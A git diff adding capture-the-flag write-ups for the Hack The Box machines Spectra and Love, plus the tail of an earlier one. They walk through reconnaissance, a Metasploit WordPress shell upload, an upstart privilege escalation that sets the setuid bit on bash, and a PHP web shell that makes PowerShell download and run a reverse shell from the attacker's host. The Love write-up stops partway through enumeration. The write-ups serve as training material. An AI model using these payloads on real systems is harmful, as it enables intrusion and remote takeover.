+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ **C:\ColdFusion8\runtime\bin>whoami**
+ nt authority\system
+
+ **C:\ColdFusion8\runtime\bin>more C:\Users\Administrator\Desktop\root.txt**
+ more C:\Users\Administrator\Desktop\root.txt
+ ceXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/60.md b/Easy/60.md
new file mode 100644
index 0000000..13415d9
--- /dev/null
+++ b/Easy/60.md
@@ -0,0 +1,527 @@
+# Spectra Writeup
+
+
+
+## Introduction :
+
+Spectra is an easy box released back in Febuary 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → nmap -vvv -p- 10.129.186.23 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.129.186.23
+ Discovered open port 3306/tcp on 10.129.186.23
+ Discovered open port 80/tcp on 10.129.186.23
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → nmap -sCV -p 22,80,3306 10.129.186.23
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-09 13:20 CEST
+ Nmap scan report for 10.129.186.23
+ Host is up (0.45s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
+ | ssh-hostkey:
+ |_ 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
+ 80/tcp open http nginx 1.17.4
+ |_http-server-header: nginx/1.17.4
+ |_http-title: Site doesn't have a title (text/html).
+ 3306/tcp open mysql MySQL (unauthorized)
+ |_ssl-cert: ERROR: Script execution failed (use -d to debug)
+ |_ssl-date: ERROR: Script execution failed (use -d to debug)
+ |_sslv2: ERROR: Script execution failed (use -d to debug)
+ |_tls-alpn: ERROR: Script execution failed (use -d to debug)
+ |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 50.62 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+We press **CTRL+U** to view the page sourcecode:
+
+
+
+Which reveals us the **spectra.htb** hostname, so we add it to our hostfile:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.129.186.23 spectra.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping -c1 spectra.htb
+ PING spectra.htb (10.129.186.23) 56(84) bytes of data.
+ 64 bytes from spectra.htb (10.129.186.23): icmp_seq=1 ttl=63 time=449 ms
+
+ --- spectra.htb ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 449.174/449.174/449.174/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+
+
+Once that's done, we can visit first visit **http://spectra.htb/main/index.php** :
+
+
+
+So here we have a wordpress site, the other link gives a database connection error:
+
+
+
+The error doesn't give us any info, therefore we move on to scanning the wordpress website:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → wpscan --url http://spectra.htb/main/
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.8.18
+
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [i] Updating the Database ...
+ [i] Update completed.
+
+ [+] URL: http://spectra.htb/main/ [10.129.186.23]
+ [+] Started: Mon Aug 9 13:48:33 2021
+
+ Interesting Finding(s):
+
+ [+] Headers
+ | Interesting Entries:
+ | - Server: nginx/1.17.4
+ | - X-Powered-By: PHP/5.6.40
+ | Found By: Headers (Passive Detection)
+ | Confidence: 100%
+
+ [+] XML-RPC seems to be enabled: http://spectra.htb/main/xmlrpc.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+ | References:
+ | - http://codex.wordpress.org/XML-RPC_Pingback_API
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
+ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
+
+ [+] WordPress readme found: http://spectra.htb/main/readme.html
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+
+ [+] The external WP-Cron seems to be enabled: http://spectra.htb/main/wp-cron.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 60%
+ | References:
+ | - https://www.iplocation.net/defend-wordpress-from-ddos
+ | - https://github.com/wpscanteam/wpscan/issues/1299
+
+ [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
+ | Found By: Rss Generator (Passive Detection)
+ | - http://spectra.htb/main/?feed=rss2, generator>https://wordpress.org/?v=5.4.2 generator>
+ | - http://spectra.htb/main/?feed=comments-rss2, generator>https://wordpress.org/?v=5.4.2 generator>
+
+ [+] WordPress theme in use: twentytwenty
+ | Location: http://spectra.htb/main/wp-content/themes/twentytwenty/
+ | Last Updated: 2021-07-22T00:00:00.000Z
+ | Readme: http://spectra.htb/main/wp-content/themes/twentytwenty/readme.txt
+ | [!] The version is out of date, the latest version is 1.8
+ | Style URL: http://spectra.htb/main/wp-content/themes/twentytwenty/style.css?ver=1.2
+ | Style Name: Twenty Twenty
+ | Style URI: https://wordpress.org/themes/twentytwenty/
+ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
+ | Author: the WordPress team
+ | Author URI: https://wordpress.org/
+ |
+ | Found By: Css Style In Homepage (Passive Detection)
+ |
+ | Version: 1.2 (80% confidence)
+ | Found By: Style (Passive Detection)
+ | - http://spectra.htb/main/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2'
+
+ [+] Enumerating All Plugins (via Passive Methods)
+
+ [i] No plugins Found.
+
+ [+] Enumerating Config Backups (via Passive and Aggressive Methods)
+ Checking Config Backups - Time: 00:00:15
+ [i] No Config Backups Found.
+
+ [!] No WPScan API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
+
+ [+] Finished: Mon Aug 9 13:49:12 2021
+ [+] Requests Done: 186
+ [+] Cached Requests: 5
+ [+] Data Sent: 46.09 KB
+ [+] Data Received: 17.279 MB
+ [+] Memory used: 220.246 MB
+ [+] Elapsed time: 00:00:38
+
+
+
+Nothing too interesting in here, the intended path was to dirbust the /testing/ directory or just browsing it since it has nginx's autoindexing enabled:
+
+
+
+The interesting file here is **wp-config.php.save** :
+
+
+
+Now here it looks like we have credentials to use. But where ? Let's first try **/main/wp-admin/** the default admin username being **administrator** :
+
+ 
+
+And we are logged in as the administrator user! First thing we can do here is get a reverse shell by injecting the appearance php code of the wordpress website with a reverse shell:
+
+
+
+However the website is way too unresponsive for us to be able to do that, so instead we're going to use metasploit:
+
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/23 ] [~/HTB/Spectra]
+ → msfconsole
+ ..-
+ ######## #
+ ################# #
+ ###################### #
+ ######################### #
+ ############################
+ ##############################
+ ###############################
+ ###############################
+ ##############################
+ # ######## #
+ ## ### #### ##
+ ### ###
+ #### ###
+ #### ########## ####
+ ####################### ####
+ #################### ####
+ ################## ####
+ ############ ##
+ ######## ###
+ ######### #####
+ ############ ######
+ ######## #########
+ ##### ########
+ ### #########
+ ###### ############
+ #######################
+ # # ### # # ##
+ ########################
+ ## ## ## ##
+ https://metasploit.com
+
+
+ =[ metasploit v6.0.53-dev ]
+ + -- --=[ 2149 exploits - 1143 auxiliary - 366 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 8 evasion ]
+
+ Metasploit tip: Start commands with a space to avoid saving
+ them to history
+
+ msf6 > use unix/webapp/wp_admin_shell_upload
+ [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
+
+ Module options (exploit/unix/webapp/wp_admin_shell_upload):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PASSWORD yes The WordPress password to authenticate with
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes The base path to the wordpress application
+ USERNAME yes The WordPress username to authenticate with
+ VHOST no HTTP server virtual host
+
+
+ Payload options (php/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST 10.66.66.2 yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 WordPress
+
+
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.129.186.23
+ RHOSTS => 10.129.186.23
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/
+ TARGETURI => /main/
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME administrator
+ USERNAME => administrator
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD devteam01
+ PASSWORD => devteam01
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST spectra.htb
+ VHOST => spectra.htb
+
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST tun0
+ LHOST => tun0
+
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
+
+
+
+
+ msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.34:4444
+ [*] Authenticating with WordPress using administrator:devteam01...
+ [+] Authenticated with WordPress
+ [*] Preparing payload...
+ [*] Uploading payload...
+ [*] Executing the payload at /main/wp-content/plugins/UtPzwuowWY/DRoQRuMWzs.php...
+ [*] Sending stage (39282 bytes) to 10.129.186.23
+ [+] Deleted DRoQRuMWzs.php
+ [+] Deleted UtPzwuowWY.php
+ [+] Deleted ../UtPzwuowWY
+ [*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.129.186.23:40514) at 2021-08-09 15:07:29 +0200
+
+ meterpreter > shell
+ Process 11921 created.
+ Channel 0 created.
+ sh: 0: getcwd() failed: No such file or directory
+ sh: 0: getcwd() failed: No such file or directory
+ id
+ uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)
+
+ echo $0
+ bash
+
+
+So here we managed to get a bash shell onto the box, however it is very limited, so we upgrade it like so:
+
+
+ export PATH
+ export PATH
+ export TERM=xterm
+ export TERM=xterm
+ which python3
+ which python3
+ /usr/local/bin/python3
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ nginx@spectra / $ cd ~
+ cd ~
+ nginx@spectra ~ $ ls -lash
+ ls -lash
+ total 32K
+ 4.0K drwxr-xr-x 5 nginx nginx 4.0K Feb 4 2021 .
+ 4.0K drwxr-xr-x 8 root root 4.0K Feb 2 2021 ..
+ 0 lrwxrwxrwx 1 root root 9 Feb 4 2021 .bash_history -> /dev/null
+ 4.0K -rw-r--r-- 1 nginx nginx 127 Dec 22 2020 .bash_logout
+ 4.0K -rw-r--r-- 1 nginx nginx 204 Dec 22 2020 .bash_profile
+ 4.0K -rw-r--r-- 1 nginx nginx 551 Dec 22 2020 .bashrc
+ 4.0K drwx------ 3 nginx nginx 4.0K Jan 15 2021 .pki
+ 4.0K drwx------ 2 nginx nginx 4.0K Jan 15 2021 .ssh
+ 4.0K drwxr-xr-x 2 nginx nginx 4.0K Jan 15 2021 log
+
+
+
+Now from here we need to take a look at which user has the user flag:
+
+
+ nginx@spectra ~ $ ls -lash /home
+ ls -lash /home
+ total 32K
+ 4.0K drwxr-xr-x 8 root root 4.0K Feb 2 2021 .
+ 4.0K drwxr-xr-x 22 root root 4.0K Feb 2 2021 ..
+ 4.0K drwx------ 4 root root 4.0K Jul 20 2020 .shadow
+ 4.0K drwxr-xr-x 20 chronos chronos 4.0K Aug 9 04:15 chronos
+ 4.0K drwxr-xr-x 5 katie katie 4.0K Feb 2 2021 katie
+ 4.0K drwxr-xr-x 5 nginx nginx 4.0K Feb 4 2021 nginx
+ 4.0K drwxr-x--t 4 root root 4.0K Jul 20 2020 root
+ 4.0K drwxr-xr-x 4 root root 4.0K Jul 20 2020 user
+ nginx@spectra ~ $ ls -lash /home/katie
+ ls -lash /home/katie
+ total 36K
+ 4.0K drwxr-xr-x 5 katie katie 4.0K Feb 2 2021 .
+ 4.0K drwxr-xr-x 8 root root 4.0K Feb 2 2021 ..
+ 0 lrwxrwxrwx 1 root root 9 Feb 2 2021 .bash_history -> /dev/null
+ 4.0K -rw-r--r-- 1 katie katie 127 Dec 22 2020 .bash_logout
+ 4.0K -rw-r--r-- 1 katie katie 204 Dec 22 2020 .bash_profile
+ 4.0K -rw-r--r-- 1 katie katie 551 Dec 22 2020 .bashrc
+ 4.0K drwx------ 3 katie katie 4.0K Jan 15 2021 .pki
+ 4.0K drwx------ 2 katie katie 4.0K Feb 10 06:10 .ssh
+ 4.0K drwxr-xr-x 2 katie katie 4.0K Jan 15 2021 log
+ 4.0K -r-------- 1 katie katie 33 Feb 2 2021 user.txt
+ nginx@spectra ~ $ cat /home/katie/user.txt
+ cat /home/katie/user.txt
+ cat: /home/katie/user.txt: Permission denied
+
+
+Now if we take a look at **/etc/autologin/passwd** we see a cleartext password:
+
+
+ nginx@spectra ~ $ cat /etc/autologin/passwd
+ cat /etc/autologin/passwd
+ SummerHereWeCome!!
+
+
+
+So let's try to use it to login as the katie user:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/25 ] [~/HTB/Spectra]
+ → ssh katie@spectra.htb
+ The authenticity of host 'spectra.htb (10.129.186.23)' can't be established.
+ RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'spectra.htb,10.129.186.23' (RSA) to the list of known hosts.
+ Password:
+ katie@spectra ~ $ id
+ uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
+ katie@spectra ~ $ cat user.txt
+ e8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there we go! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get to the root flag we first need to enumerate the box. To do that we can use linpeas.sh:
+
+
+ [term1]
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → ls -lash linpeas.sh
+ 336K -rwxr-xr-x 1 nothing nothing 334K Aug 9 15:52 linpeas.sh
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB/Spectra]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ katie@spectra ~ $ wget http://10.10.14.34:9090/linpeas.sh -O /tmp/linpeas.sh
+ --2021-08-09 07:50:17-- http://10.10.14.34:9090/linpeas.sh
+ Connecting to 10.10.14.34:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: '/tmp/linpeas.sh'
+
+ /tmp/linpeas.sh 100%[======================================================================================================================================================>] 333.85K 143KB/s in 2.3s
+
+ 2021-08-09 07:50:21 (143 KB/s) - '/tmp/linpeas.sh' saved [341863/341863]
+
+ katie@spectra ~ $ chmod +x /tmp/linpeas.sh
+ katie@spectra ~ $ /tmp/linpeas.sh
+ -bash: /tmp/linpeas.sh: Permission denied
+
+
+
+However there's a problem since we cannot run it, therefore we check it manually, our first reflex is to check **sudo -l** :
+
+
+ katie@spectra ~ $ sudo -l
+ User katie may run the following commands on spectra:
+ (ALL) SETENV: NOPASSWD: /sbin/initctl
+
+
+
+Here it looks like we can run /sbin/initctl without any password, so let's look for a gtfobin:
+
+
+
+However there's no gtfobin for it.
+
+
+ katie@spectra ~ $ sudo initctl
+ initctl: missing command
+ Try `initctl --help' for more information.
+ katie@spectra ~ $ sudo initctl --help
+ Usage: initctl [OPTION]... COMMAND [OPTION]... [ARG]...
+
+ Options:
+ --session use D-Bus session bus to connect to init daemon (for testing)
+ --system use D-Bus system bus to connect to init daemon
+ --dest=NAME destination well-known name on D-Bus bus
+ -q, --quiet reduce output to errors only
+ -v, --verbose increase output to include informational messages
+ --help display this help and exit
+ --version output version information and exit
+
+ For a list of commands, try `initctl help'.
+
+
+
+Here we can see that this binary can be used to communicate and interact with the upstart init daemon, processes managed by init are defined by files in the **/etc/init** directory. So we can create a **privesc.conf** file in /etc/init, however the directory itself is owned by the root user, therefore we need to access it with another group, the **developers** group:
+
+
+ katie@spectra /etc/init $ id
+ uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
+ katie@spectra /etc/init $ ls -lash | grep developers
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test1.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test10.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test2.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test3.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test4.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test5.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test6.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test7.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test8.conf
+ 4.0K -rw-rw---- 1 root developers 478 Jun 29 2020 test9.conf
+
+
+
+So since we can only access these .conf files we're going to have our privesc file into **test.conf** so let's edit it to change permissions on the bash binary:
+
+
+ katie@spectra /etc/init $ vim test.conf
+ katie@spectra /etc/init $ cat test.conf
+ script
+ chmod +s /bin/bash
+ end script
+ katie@spectra /etc/init $ sudo /sbin/initctl start test
+ test start/running, process 21674
+ katie@spectra /etc/init $ /bin/bash -p
+ bash-4.3# id
+ uid=20156(katie) gid=20157(katie) euid=0(root) egid=0(root) groups=0(root),20157(katie),20158(developers)
+ bash-4.3# cat /root/root.txt
+ d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the root user and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/61.md b/Easy/61.md
new file mode 100644
index 0000000..672399b
--- /dev/null
+++ b/Easy/61.md
@@ -0,0 +1,363 @@
+# Love Writeup
+
+
+
+## Introduction :
+
+Love is an easy Windows box released back in May 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB]
+ → nmap -vvv -p- 10.129.48.103 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 135/tcp on 10.129.48.103
+ Discovered open port 3306/tcp on 10.129.48.103
+ Discovered open port 80/tcp on 10.129.48.103
+ Discovered open port 445/tcp on 10.129.48.103
+ Discovered open port 443/tcp on 10.129.48.103
+ Discovered open port 139/tcp on 10.129.48.103
+ Discovered open port 7680/tcp on 10.129.48.103
+ Discovered open port 49668/tcp on 10.129.48.103
+ Discovered open port 49667/tcp on 10.129.48.103
+ Discovered open port 49664/tcp on 10.129.48.103
+ Discovered open port 47001/tcp on 10.129.48.103
+ Discovered open port 49666/tcp on 10.129.48.103
+ Discovered open port 5040/tcp on 10.129.48.103
+ Discovered open port 49669/tcp on 10.129.48.103
+ Discovered open port 49665/tcp on 10.129.48.103
+ Discovered open port 49670/tcp on 10.129.48.103
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB]
+ → nmap -sCV -p135,80,139,445,443 10.129.48.103
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-10 20:19 CEST
+ Nmap scan report for 10.129.48.103
+ Host is up (0.45s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
+ | http-cookie-flags:
+ | /:
+ | PHPSESSID:
+ |_ httponly flag not set
+ |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ |_http-title: Voting System using PHP
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
+ |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ |_http-title: 403 Forbidden
+ | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
+ | Not valid before: 2021-01-18T14:00:16
+ |_Not valid after: 2022-01-18T14:00:16
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+ 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
+ Service Info: Hosts: www.example.com, LOVE; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 2h41m33s, deviation: 4h02m31s, median: 21m32s
+ | smb-os-discovery:
+ | OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
+ | OS CPE: cpe:/o:microsoft:windows_10::-
+ | Computer name: Love
+ | NetBIOS computer name: LOVE\x00
+ | Workgroup: WORKGROUP\x00
+ |_ System time: 2021-08-10T11:41:29-07:00
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2021-08-10T18:41:32
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 39.83 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 at love.htb (see the SSL Cert) so let's investigate it:
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.129.48.103 love.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping love.htb
+ PING love.htb (10.129.48.103) 56(84) bytes of data.
+ 64 bytes from love.htb (10.129.48.103): icmp_seq=1 ttl=127 time=24.4 ms
+ 64 bytes from love.htb (10.129.48.103): icmp_seq=2 ttl=127 time=28.5 ms
+ 64 bytes from love.htb (10.129.48.103): icmp_seq=3 ttl=127 time=23.3 ms
+ ^C
+ --- love.htb ping statistics ---
+ 3 packets transmitted, 3 received, 0% packet loss, time 2003ms
+ rtt min/avg/max/mdev = 23.337/25.387/28.458/2.211 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.34/23 ] [ /dev/pts/21 ] [~/HTB]
+ →
+
+
+` 
+
+Here we get a login form, nothing interesting there, so we check out the subdomain that our nmap scan picked up at **staging.love.htb** after editing our /etc/hosts file:
+
+
+ o
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB]
+ → cat /etc/hosts | grep love.htb
+ 10.129.48.103 staging.love.htb love.htb
+
+
+` 
+
+Clicking on 'Demo', redirects us to **/beta.php** which wants us to specify an URL to scan a file:
+
+
+
+So here we can apparently get the box to scan what it interprets as local addresses, so let's try the other ports our nmap scan picked up:
+
+
+
+Here's why this is an easy box, using the file scan feature we make it scan it's own port 5000 that our nmap scan picked up and the html file it returns is basically showing us admin credentials with the password **@LoveIsInTheAir!!!!**
+
+So for the next step let's use the credentials we just got to login as admin into the love.htb login form we found earlier:
+
+ 
+
+And we're logged in as the "Neo Devierte" user! Now from here we navigate to the 'voters' page:
+
+ 
+
+So here's the plan:
+
+
+
+So from here we know a few things, first this is a windows machine, so we know that we will probably need a reverse shell **payload for powershell** , probably we're going to use **[nishang's revshell ps1](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell)** for that, Second of all we know that this box uses **php** , therefore we need a payload to make the box run **exec()** to download our revshell ps1 payload and execute it in order to get a reverse shell, so we prepare our 2 payloads:
+
+
+ [term1]
+ [ 10.10.14.34/23 ] [ /dev/pts/13 ] [~/HTB/Love]
+ → nc -lvnp 9001
+ Listening on 0.0.0.0 9001
+
+
+ [term2]
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → curl https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 > revshell.ps1
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 4339 100 4339 0 0 61112 0 --:--:-- --:--:-- --:--:-- 61112
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → vim revshell.ps1
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → tail -n2 revshell.ps1
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 9001
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → vim shell.php
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → cat shell.php
+ <****?php echo exec("powershell IEX (New-Object Net.WebClient).DownloadString('**http://10.10.14.34:9090/revshell.ps1** ')"); ?>
+
+
+
+Now we're going to host the **revshell.ps1** payload we just made with a simple python3 http server **on port 9090**
+
+
+ [term2]
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → cat shell.php
+ <****?php echo exec("powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.34/revshell.ps1')"); ?>
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → cat revshell.ps1 | tail -n2
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 9001
+
+
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+Once that's done, we upload our shell.php file through the image upload and see if we get a reverse shell connection back:
+
+ 
+
+We successfully managed to upload our shell.php file as the voter's profile picture, and when we check our terminal we see that our plan got executed:
+
+
+ [term2]
+ [ 10.10.14.34/23 ] [ /dev/pts/1 ] [~/HTB/Love]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.48.103 - - [13/Aug/2021 21:49:33] "GET /revshell.ps1 HTTP/1.1" 200 -
+
+ [term1]
+ [ 10.10.14.34/23 ] [ /dev/pts/13 ] [~/HTB/Love]
+ → nc -lvnp 9001
+ Listening on 0.0.0.0 9001
+ Connection received on 10.129.48.103 62349
+ Windows PowerShell running as user Phoebe on LOVE
+ Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+ PS C:\xampp\htdocs\omrs\images>whoami
+ love\phoebe
+
+
+And we have a reverse shell back! Now let's see if we can get to the user's flag:
+
+
+ PS C:\xampp\htdocs\omrs\images> cd ~
+ PS C:\Users\Phoebe> ls
+
+
+ Directory: C:\Users\Phoebe
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 4/12/2021 3:50 PM 3D Objects
+ d-r--- 4/12/2021 3:50 PM Contacts
+ d-r--- 4/13/2021 3:20 AM Desktop
+ d-r--- 4/12/2021 3:50 PM Documents
+ d-r--- 4/13/2021 9:55 AM Downloads
+ d-r--- 4/12/2021 3:50 PM Favorites
+ d-r--- 4/12/2021 3:50 PM Links
+ d-r--- 4/12/2021 3:50 PM Music
+ d-r--- 4/12/2021 3:52 PM OneDrive
+ d-r--- 4/21/2021 7:01 AM Pictures
+ d-r--- 4/12/2021 3:50 PM Saved Games
+ d-r--- 4/12/2021 3:51 PM Searches
+ d-r--- 4/23/2021 3:39 AM Videos
+
+
+ PS C:\Users\Phoebe> type Desktop\user.txt
+ b2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we have been able to get the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get to the Administrator Privileges, we need to enumerate the box, let's do so using **Invoke-winPEAS.ps1** by powershell-empire:
+
+
+ [term1]
+ [ 10.10.14.34/23 ] [ /dev/pts/12 ] [~/HTB/Love]
+ → locate winPEAS | grep ps1
